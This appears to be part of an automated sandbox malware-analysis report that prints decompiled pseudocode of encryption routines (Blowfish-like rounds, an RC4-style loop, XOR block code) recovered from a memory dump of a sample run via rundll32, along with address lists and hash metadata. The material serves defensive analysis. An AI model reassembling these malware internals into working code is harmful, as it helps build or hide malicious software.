				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t428 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t429 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t429 * 4));
				asm("rol edx, cl");
				r8d = __rdx[0x12] + r10d;
				_t430 = _t429 >> 8;
				_t464 = _t461 >> 0x10 >> 0x10 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t430 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t464 * 4));
				asm("rol eax, cl");
				r8d = __rdx[0x14] ^ r11d;
				_t432 = _t430 >> 0x10 >> 8;
				_t433 = _t432 >> 0x18;
				r10d = r10d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t432 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t433 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t433 * 4);
				asm("rol eax, cl");
				r8d = __rdx[0x16] - r10d;
				_t434 = _t433 >> 8;
				_t435 = _t434 >> 0x18;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t434 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t435 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t435 * 4));
				if (__rdx[0x20] != 0) goto 0xf305c49a;
				asm("rol edx, cl");
				r8d = __rdx[0x18] + r11d;
				_t436 = _t435 >> 8;
				_t467 = _t464 >> 0x10 >> 0x10 >> 0x18;
				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t436 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t467 * 4));
				asm("rol eax, cl");
				r8d = __rdx[0x1a] ^ r10d;
				_t439 = _t436 >> 0x10 >> 8 >> 0x18;
				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t439 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t439 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t439 * 4);
				asm("rol eax, cl");
				r8d = __rdx[0x1c] - r11d;
				_t440 = _t439 >> 8;
				_t441 = _t440 >> 0x18;
				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t440 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t441 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t441 * 4));
				asm("rol edx, cl");
				r8d = __rdx[0x1e] + r10d;
				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + (_t441 >> 8) * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (_t467 >> 0x10 >> 0x10 >> 0x18) * 4));
				 *__rcx = r11d;
				 *(__rcx + 4) = r10d;
				return r8d;
			}































                                        0x21ef305bff0
                                        0x21ef305bff5
                                        0x21ef305bffa
                                        0x21ef305bfff
                                        0x21ef305c009
                                        0x21ef305c010
                                        0x21ef305c019
                                        0x21ef305c01c
                                        0x21ef305c022
                                        0x21ef305c026
                                        0x21ef305c02e
                                        0x21ef305c036
                                        0x21ef305c04f
                                        0x21ef305c05a
                                        0x21ef305c062
                                        0x21ef305c068
                                        0x21ef305c06a
                                        0x21ef305c06d
                                        0x21ef305c08c
                                        0x21ef305c0a9
                                        0x21ef305c0af
                                        0x21ef305c0b1
                                        0x21ef305c0b4
                                        0x21ef305c0d3
                                        0x21ef305c0ed
                                        0x21ef305c0f6
                                        0x21ef305c0f8
                                        0x21ef305c0fd
                                        0x21ef305c122
                                        0x21ef305c138
                                        0x21ef305c13e
                                        0x21ef305c140
                                        0x21ef305c143
                                        0x21ef305c162
                                        0x21ef305c17f
                                        0x21ef305c185
                                        0x21ef305c187
                                        0x21ef305c18a
                                        0x21ef305c1a9
                                        0x21ef305c1c3
                                        0x21ef305c1cc
                                        0x21ef305c1ce
                                        0x21ef305c1d3
                                        0x21ef305c1f8
                                        0x21ef305c20e
                                        0x21ef305c214
                                        0x21ef305c216
                                        0x21ef305c219
                                        0x21ef305c238
                                        0x21ef305c255
                                        0x21ef305c25b
                                        0x21ef305c25d
                                        0x21ef305c260
                                        0x21ef305c27c
                                        0x21ef305c296
                                        0x21ef305c2a2
                                        0x21ef305c2a4
                                        0x21ef305c2a9
                                        0x21ef305c2ce
                                        0x21ef305c2e4
                                        0x21ef305c2ea
                                        0x21ef305c2ec
                                        0x21ef305c2ef
                                        0x21ef305c30e
                                        0x21ef305c32b
                                        0x21ef305c331
                                        0x21ef305c333
                                        0x21ef305c336
                                        0x21ef305c352
                                        0x21ef305c36c
                                        0x21ef305c376
                                        0x21ef305c385
                                        0x21ef305c387
                                        0x21ef305c38c
                                        0x21ef305c3b1
                                        0x21ef305c3c7
                                        0x21ef305c3cd
                                        0x21ef305c3cf
                                        0x21ef305c3dc
                                        0x21ef305c40e
                                        0x21ef305c414
                                        0x21ef305c416
                                        0x21ef305c419
                                        0x21ef305c438
                                        0x21ef305c452
                                        0x21ef305c45b
                                        0x21ef305c45d
                                        0x21ef305c497
                                        0x21ef305c4a4
                                        0x21ef305c4a7
                                        0x21ef305c4b0

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ced8dff309c0efac702c57e9b3aef14b10ba4d9a76278bd47c746b3f992d865
                                        • Instruction ID: 867143427dd99c0482f3d546a6aa0a47040b07ceccb9ffc2f3925bf00efc95c6
                                        • Opcode Fuzzy Hash: 2ced8dff309c0efac702c57e9b3aef14b10ba4d9a76278bd47c746b3f992d865
                                        • Instruction Fuzzy Hash: 89C135722202248BD765CF2DF88886A77E2F7A974D7849A04FBC657789C13DF605CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3042E60 Relevance: .3, Instructions: 270COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3042E60(void* __ebx, long long __rbx, signed int __rcx, unsigned int __rdx, long long __rdi, long long __rsi, signed int* __r8, signed int __r9, signed int __r10, signed int __r11) {
				signed char _t404;
				unsigned long long _t439;
				signed char* _t472;
				signed int* _t476;
				long long _t478;
				void* _t483;

				 *((long long*)(_t483 + 8)) = __rbx;
				 *((long long*)(_t483 + 0x10)) = _t478;
				 *((long long*)(_t483 + 0x18)) = __rsi;
				 *((long long*)(_t483 + 0x20)) = __rdi;
				r11d =  *__rcx;
				r10d =  *(__rcx + 4);
				_t439 = __rdx >> 3;
				if (_t439 == 0) goto 0xf3043078;
				r9d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *__r9 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *__r8;
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 1) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 2) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 3) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 4) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 5) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
				r9d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *(__r9 + 6) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
				r11d = __r9 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t476 =  &(__r8[2]);
				 *(__r9 + 7) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
				_t472 = __r9 + 8;
				if (_t439 != 0) goto 0xf3042ea0;
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				 *_t472 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *_t476;
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[1] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[2] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[3] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[4] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[5] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t472[6] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[1];
				if (_t439 == 0) goto 0xf3043291;
				r11d = __r11 + 0x00000001 & 0x000000ff;
				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
				r10d = __r8 + __r10 & 0x000000ff;
				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
				_t404 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *_t476;
				 *_t472 = _t404;
				if (__rdx - 0xfffffffffffffffa != 0) goto 0xf30430c2;
				 *__rcx = r11d;
				 *(__rcx + 4) = r10d;
				return _t404;
			}









                                        0x21ef3042e60
                                        0x21ef3042e65
                                        0x21ef3042e6a
                                        0x21ef3042e6f
                                        0x21ef3042e76
                                        0x21ef3042e7c
                                        0x21ef3042e90
                                        0x21ef3042e93
                                        0x21ef3042ea4
                                        0x21ef3042ea8
                                        0x21ef3042eb5
                                        0x21ef3042ebe
                                        0x21ef3042ec1
                                        0x21ef3042ed5
                                        0x21ef3042edb
                                        0x21ef3042edf
                                        0x21ef3042eec
                                        0x21ef3042ef5
                                        0x21ef3042ef8
                                        0x21ef3042f0d
                                        0x21ef3042f14
                                        0x21ef3042f18
                                        0x21ef3042f25
                                        0x21ef3042f2e
                                        0x21ef3042f31
                                        0x21ef3042f46
                                        0x21ef3042f4d
                                        0x21ef3042f51
                                        0x21ef3042f5e
                                        0x21ef3042f67
                                        0x21ef3042f6a
                                        0x21ef3042f7f
                                        0x21ef3042f86
                                        0x21ef3042f8a
                                        0x21ef3042f97
                                        0x21ef3042fa0
                                        0x21ef3042fa3
                                        0x21ef3042fb8
                                        0x21ef3042fbf
                                        0x21ef3042fc3
                                        0x21ef3042fd0
                                        0x21ef3042fd9
                                        0x21ef3042fdc
                                        0x21ef3042ff1
                                        0x21ef3042ff8
                                        0x21ef3042ffc
                                        0x21ef3043009
                                        0x21ef3043012
                                        0x21ef3043015
                                        0x21ef304302a
                                        0x21ef3043031
                                        0x21ef3043035
                                        0x21ef3043042
                                        0x21ef304304b
                                        0x21ef304304e
                                        0x21ef3043063
                                        0x21ef3043067
                                        0x21ef304306a
                                        0x21ef3043072
                                        0x21ef304307b
                                        0x21ef3043085
                                        0x21ef3043089
                                        0x21ef3043096
                                        0x21ef304309f
                                        0x21ef30430a2
                                        0x21ef30430b6
                                        0x21ef30430bc
                                        0x21ef30430c6
                                        0x21ef30430ca
                                        0x21ef30430d7
                                        0x21ef30430e0
                                        0x21ef30430e3
                                        0x21ef30430f8
                                        0x21ef30430ff
                                        0x21ef3043109
                                        0x21ef304310d
                                        0x21ef304311a
                                        0x21ef3043123
                                        0x21ef3043126
                                        0x21ef304313b
                                        0x21ef3043142
                                        0x21ef304314c
                                        0x21ef3043150
                                        0x21ef304315d
                                        0x21ef3043166
                                        0x21ef3043169
                                        0x21ef304317e
                                        0x21ef3043185
                                        0x21ef304318f
                                        0x21ef3043193
                                        0x21ef30431a0
                                        0x21ef30431a9
                                        0x21ef30431ac
                                        0x21ef30431c1
                                        0x21ef30431c8
                                        0x21ef30431d2
                                        0x21ef30431d6
                                        0x21ef30431e3
                                        0x21ef30431ec
                                        0x21ef30431ef
                                        0x21ef3043204
                                        0x21ef304320b
                                        0x21ef3043215
                                        0x21ef3043219
                                        0x21ef3043226
                                        0x21ef304322f
                                        0x21ef3043232
                                        0x21ef3043247
                                        0x21ef304324e
                                        0x21ef3043254
                                        0x21ef3043258
                                        0x21ef3043265
                                        0x21ef304326e
                                        0x21ef3043271
                                        0x21ef3043283
                                        0x21ef3043285
                                        0x21ef304328b
                                        0x21ef30432a5
                                        0x21ef30432a8
                                        0x21ef30432ae

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e457136d7b82e30fdc63789bf8eb56974cea7a9059dafed3d447c4b0dc03fc3e
                                        • Instruction ID: 1a05ca5e9caa1eda1bb9016b0eb11c09d83b83985f41ae4c2676d1a82bd85c3d
                                        • Opcode Fuzzy Hash: e457136d7b82e30fdc63789bf8eb56974cea7a9059dafed3d447c4b0dc03fc3e
                                        • Instruction Fuzzy Hash: D2D19E731286A48EC715CF55C088CAD7BBAF315745786C2AADFC5C3682C325EAADDB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF303D990 Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0b0d06c46f2ef17ac458ab5cfccd720c50535bdd8bf3ea15260215372d5ae42
                                        • Instruction ID: 1be978c27f88a45db11971389e5dd19ab8dffb3e8fd879455a51bd147f967624
                                        • Opcode Fuzzy Hash: f0b0d06c46f2ef17ac458ab5cfccd720c50535bdd8bf3ea15260215372d5ae42
                                        • Instruction Fuzzy Hash: A1B11B2331A2C58FD30DCE7D49405AD6F61E376A04748859EDF81EB78BC518DA2AC7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30631E0 Relevance: .2, Instructions: 239COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f10bb955cce9e4bb5625015ee70f205ada93e5c97b3a5163307eea800fc0584
                                        • Instruction ID: 27e5c4e7a1f9173764e2670f9457efbee337dae98e8d8eaea7c60357bd18f29d
                                        • Opcode Fuzzy Hash: 5f10bb955cce9e4bb5625015ee70f205ada93e5c97b3a5163307eea800fc0584
                                        • Instruction Fuzzy Hash: 2D71A4A3B166D84BCB54CB1EBC4165AFAD5F398BC8B18D125EE8C87B65E53CD602C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3043670 Relevance: .2, Instructions: 219COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E0000021E21EF3043670() {
				signed int _t12;
				void* _t25;
				void* _t27;
				void* _t28;

				r10d = r10d ^ _t12;
				 *(_t25 + 8) = r10d;
				r10d = _t28 - 1;
				 *(_t27 + 8) =  *(_t27 + 8) ^ _t12;
				asm("dec ax");
				asm("punpcklqdq xmm3, xmm3");
				if (r10d - 9 > 0) goto 0xf30436c5;
				goto __rcx;
			}







                                        0x21ef3043691
                                        0x21ef3043694
                                        0x21ef3043698
                                        0x21ef304369c
                                        0x21ef30436a0
                                        0x21ef30436a5
                                        0x21ef30436ad
                                        0x21ef30436c3

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fddbc7fe2d619c317f765c4772342b077af5910fd1e9f6a36f4bab8183655e82
                                        • Instruction ID: ae5cd0389258d96c21fc09f59259e109bc780b673ce9fc61912a3872b64d7ae5
                                        • Opcode Fuzzy Hash: fddbc7fe2d619c317f765c4772342b077af5910fd1e9f6a36f4bab8183655e82
                                        • Instruction Fuzzy Hash: 5F9124B3215E8482EA14CB29C8995AE7765FB9CBC4B02E667DE5E93724EB38C554C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF305FB60 Relevance: .2, Instructions: 216COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0000021E21EF305FB60(signed long long __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rsi, long long __r8, long long __r12, long long __r13, long long __r15) {
				void* __rdi;
				void* __r14;
				signed char _t113;
				unsigned int _t124;
				void* _t125;
				void* _t126;
				void* _t131;
				unsigned int _t140;
				void* _t141;
				void* _t145;
				void* _t151;
				signed long long _t153;
				intOrPtr _t178;
				signed long long _t179;
				signed long long _t197;
				void* _t210;
				void* _t218;
				void* _t220;
				void* _t221;
				void* _t222;
				intOrPtr _t226;
				unsigned long long _t227;
				signed long long _t228;
				long long _t232;
				void* _t233;
				long long _t234;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				unsigned long long _t261;
				void* _t262;
				void* _t264;
				long long _t271;
				void* _t272;
				void* _t275;

				_t153 = __rax;
				 *((long long*)(_t241 + 8)) = __rbx;
				 *((long long*)(_t241 + 0x10)) = _t232;
				 *((long long*)(_t241 + 0x18)) = __rsi;
				E0000021E21EF310C220();
				_t242 = _t241 - __rax;
				r8d = 0x188;
				_t233 = __rcx;
				E0000021E21EF310E410(_t126, 0, _t131, _t141, __rcx, __rdx, __r8, __r8);
				 *((long long*)(_t233 + 0x178)) = __r8;
				 *((long long*)(_t233 + 0x180)) = __rdx;
				 *((long long*)(__r8))();
				_t210 = _t233 + 0x50;
				r8d =  *(_t233 + 0x58) & 0x000000ff;
				_t261 = ((((((__rdx << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153;
				 *(_t233 + 0x58) = _t261;
				 *(_t233 + 0x50) = ((((((_t233 + 0x00000050 << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153) << 0x00000008 | _t153;
				_t197 = _t233 + 0x60;
				_t178 =  *((intOrPtr*)(_t242 + 0x30));
				_t234 =  *((intOrPtr*)(_t242 + 0x38));
				_t226 =  *((intOrPtr*)(_t242 + 0x40));
				_t243 = _t242 + 0x20;
				_t220 = _t218;
				goto 0xf30602a0;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				E0000021E21EF310C220();
				_t244 = _t243 - _t153;
				r14d = 0;
				_t227 = _t261;
				 *_t197 = _t271;
				_t221 = _t210;
				 *((long long*)(_t197 + 8)) = _t271;
				_t179 = _t197;
				 *((long long*)(_t197 + 0x40)) = _t271;
				 *((long long*)(_t197 + 0x48)) = _t271;
				 *((long long*)(_t197 + 0x30)) = _t271;
				 *((long long*)(_t197 + 0x38)) = _t271;
				 *((long long*)(_t197 + 0x170)) = _t271;
				if (_t261 != 0xc) goto 0xf305fcde;
				asm("movsd xmm0, [edx]");
				asm("movsd [ecx], xmm0");
				 *((intOrPtr*)(_t197 + 8)) =  *((intOrPtr*)(_t210 + 8));
				 *((char*)(_t197 + 0xf)) = 1;
				goto 0xf305feba;
				 *((long long*)(_t244 + 0x58)) = _t234;
				 *(_t244 + 0x50) = _t227;
				if (_t227 - 0x10 < 0) goto 0xf305fd9a;
				 *((long long*)(_t244 + 0x60)) = __r12;
				 *((long long*)(_t244 + 0x68)) = __r13;
				 *((long long*)(_t244 + 0x20)) = __r15;
				_t228 = _t227 + (_t227 >> 4) * 0xfffffff0;
				_t275 = _t197 + 0xf;
				_t262 =  ~_t179 + _t221;
				if (_t179 - _t262 + _t275 > 0) goto 0xf305fd60;
				_t145 = _t275 - _t221;
				if (_t145 < 0) goto 0xf305fd60;
				_t156 = _t179;
				asm("o16 nop [eax+eax]");
				 *_t156 =  *_t179 ^  *(_t262 + _t179) & 0x000000ff;
				if (_t145 != 0) goto 0xf305fd40;
				goto 0xf305fd70;
				asm("o16 nop [eax+eax]");
				asm("movdqu xmm1, [ebx]");
				asm("movdqu xmm0, [edi]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [ebx], xmm1");
				E0000021E21EF3060130(_t125, _t145,  &(_t156[0]), _t179, _t179, _t179 + 0x60, _t221, _t228, _t264, _t271, _t271, _t220);
				_t222 = _t221 + 0x10;
				if (_t145 != 0) goto 0xf305fd20;
				if (_t228 == 0) goto 0xf305fe3c;
				if (_t228 - 0x20 < 0) goto 0xf305fe04;
				if (_t179 - _t222 - 1 + _t228 > 0) goto 0xf305fdc1;
				if (_t179 - 1 + _t228 - _t222 >= 0) goto 0xf305fe04;
				asm("movdqu xmm0, [eax]");
				_t272 = _t271 + 0x20;
				asm("movdqu xmm1, [eax+ecx]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax-0x20], xmm1");
				asm("movdqu xmm1, [ecx+eax-0x10]");
				asm("movdqu xmm0, [eax-0x10]");
				asm("pxor xmm1, xmm0");
				asm("movdqu [eax-0x10], xmm1");
				if (_t272 - (_t228 & 0xffffffe0) < 0) goto 0xf305fdd1;
				_t151 = _t272 - _t228;
				if (_t151 >= 0) goto 0xf305fe30;
				_t223 = _t222 - _t179;
				_t203 = _t272 + _t179;
				asm("o16 nop [eax+eax]");
				 *_t203 =  *(_t272 + _t179) ^  *(_t222 - _t179 + _t272 + _t179) & 0x000000ff;
				if (_t151 != 0) goto 0xf305fe20;
				_t113 = E0000021E21EF3060130(_t125, _t151, _t179 + 0x20, _t179, _t179, _t179 + 0x60, _t222 - _t179, _t228 - _t272 - 1, _t264, _t272, _t226, _t178);
				 *(_t179 + 0xf) =  *(_t179 + 0xf) ^ bpl;
				 *(_t179 + 8) =  *(_t179 + 8) ^ _t113;
				 *(_t179 + 9) =  *(_t179 + 9) ^ _t113;
				 *(_t179 + 0xa) =  *(_t179 + 0xa) ^ _t113;
				 *(_t179 + 0xb) =  *(_t179 + 0xb) ^ _t113;
				 *(_t179 + 0xc) =  *(_t179 + 0xc) ^ _t113;
				 *(_t179 + 0xd) =  *(_t179 + 0xd) ^ _t113;
				 *(_t179 + 0xe) =  *(_t179 + 0xe) ^ _t113;
				E0000021E21EF3060130(_t125, _t151,  *(_t244 + 0x50) << 3 >> 8, _t179, _t179, _t179 + 0x60, _t223, _t228 - _t272 - 1, _t264, _t272);
				 *((intOrPtr*)(_t179 + 0x178))();
